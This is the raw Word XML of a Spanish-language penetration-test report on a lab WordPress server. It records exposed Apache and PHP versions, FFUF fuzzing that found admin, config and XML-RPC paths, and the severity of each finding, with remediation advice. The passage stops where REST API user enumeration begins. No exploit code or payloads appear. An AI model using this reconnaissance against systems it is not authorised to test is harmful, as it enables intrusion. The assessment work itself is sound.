      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7340924C" wp14:editId="049EE989">
            <wp:extent cx="5400040" cy="26860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FC49" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ANÁLISIS DE SEGURIDAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA6844B" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>La exposición de versiones específicas del servidor web y del lenguaje de programación permite a un atacante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522DE9D1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Identificar vulnerabilidades conocidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FD616" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Buscar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> públicos asociados a dichas versiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B74D7B1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">La información de versiones expuestas permite que un atacante pueda buscar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> específicos para esas versiones de Apache y PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C838900" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BADD3" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Ocultar o limitar la exposición de versiones de software en las cabeceras HTTP (por </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>ejemplo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> ocultar APACHE/X.X y PHP/XX).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB855E9" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Actualizar Apache y PHP a versiones recientes y parcheadas, especialmente si el servidor está expuesto a redes externas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4B8D0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>Auditar el servidor con escáneres de vulnerabilidades (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Nuclei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WPScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">, etc.) para detectar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> compatibles con las versiones actuales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2F65B" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESCANEO DE FUZZING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1BF06" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> y descubrimiento de directorios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A2B56" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Se realizó un proceso de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> sobre el servidor web utilizando la herramienta FFUF con el objetivo de identificar rutas ocultas y servicios accesibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D5A23" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultados obtenidos</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Se identificaron múltiples rutas asociadas a una instalación de WordPress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5347A6AA" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> → Panel de administración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED19934" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> → Página de autenticación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EF4ABD" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> → Archivo de configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C130F65" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>xmlrpc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> → Interfaz de comunicación remota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024294A0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/license.txt y /readme.html → Archivos de documentación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F804E" w14:textId="123C507F" w:rsidR="009C40CA" w:rsidRDefault="00391BA3" w:rsidP="00391BA3">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE8E53D" wp14:editId="37AF2B7A">
            <wp:extent cx="4419600" cy="26860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6AD5" w14:textId="3D1708C9" w:rsidR="00391BA3" w:rsidRPr="00301B4F" w:rsidRDefault="00391BA3" w:rsidP="00391BA3">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B8D8D8" wp14:editId="4963976E">
            <wp:extent cx="4391025" cy="268605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0647" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerabilidades identificadas</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exposición de estructura de WordPress - Severidad: MEDIA</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>La accesibilidad de rutas como /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> y /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> permite la identificación del sistema y dirigir ataques específicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CFA869" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exposición de archivos de documentación - Severidad: MEDIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C9D17" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Archivos como readme.html o license.txt pueden revelar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA31FC5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Versión de WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3306AD0C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Información del sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Esto ayuda a buscar vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22296F17" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Posible exposición de archivo de configuración (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>) - Severidad: CRÍTICA</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> contiene información sensible como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A979502" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Credenciales de base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C246D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Configuración interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E3400" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>Si este archivo es accesible desde el navegador supone un compromiso total del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2DCBFF" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML-RPC habilitado - Severidad: ALTA</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El archivo /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>xmlrpc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> permite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F7FA57" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Ataques de fuerza bruta automatizados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144B8318" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Enumeración de usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0FEFF" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Posibles ataques de denegación de servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7336DB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusión</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> permitió identificar la estructura interna del sitio web confirmando el uso de WordPress y revelando múltiples puntos de ataque que pueden ser utilizados en fases posteriores de explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C4E92" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="61C14380">
          <v:rect id="_x0000_i1027" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="592EF6CD" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis de la web de WordPress y comportamiento de redirecciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF066A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis del sitio WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Al acceder al sitio WordPress en: http://192.168.0.27/wordpress/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065F896" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>se observó un comportamiento anómalo durante la navegación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE5182" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comportamiento detectado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189B8DB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Algunas rutas redirigían o devolvían errores mostrando indicios de que el servidor estaba configurado como si se ejecutara en localhost o en un entorno de pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8547C2" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">El panel de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> de WordPress (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>) no permitía acceso correctamente incluso disponiendo de credenciales válidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E98AB" w14:textId="5FBEFEBF" w:rsidR="00301B4F" w:rsidRDefault="00391BA3" w:rsidP="00301B4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D3FC6A5" wp14:editId="52B478F0">
            <wp:extent cx="4457700" cy="26860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3E65" w14:textId="3211C632" w:rsidR="00391BA3" w:rsidRPr="00301B4F" w:rsidRDefault="00391BA3" w:rsidP="00301B4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EED33DE" wp14:editId="7B4733C6">
            <wp:extent cx="5400040" cy="26860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D07F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis automatizado del servicio web</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Ante la situación detectada se decidió centrar el análisis en la única página del sitio que respondía de forma estable y mostraba cabeceras HTTP claras.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Sobre este recurso se ejecutó un análisis automatizado que permitió identificar varias debilidades de seguridad relevantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F25761" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidad: Exposición del panel de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> de WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Se identificó una página de autenticación de WordPress que permanecía accesible de manera directa a pesar de los posibles intentos de ocultación o restricción.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ruta accesible: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Esto facilita ataques de enumeración y fuerza bruta contra el sistema de autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347DD592" w14:textId="483885B6" w:rsidR="00391BA3" w:rsidRPr="00301B4F" w:rsidRDefault="00391BA3" w:rsidP="00301B4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B6E71B5" wp14:editId="3E0C9879">
            <wp:extent cx="5400040" cy="26860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E368" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Referencia asociada</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">CVE-2024-2473 (referencia a exposición del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> en configuraciones inseguras o mal protegidas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D36C4FA" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumeración y análisis de WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F8D80" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durante la fase de análisis del servicio web se identificó que el sistema WordPress permite la enumeración de usuarios a través de la API REST.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
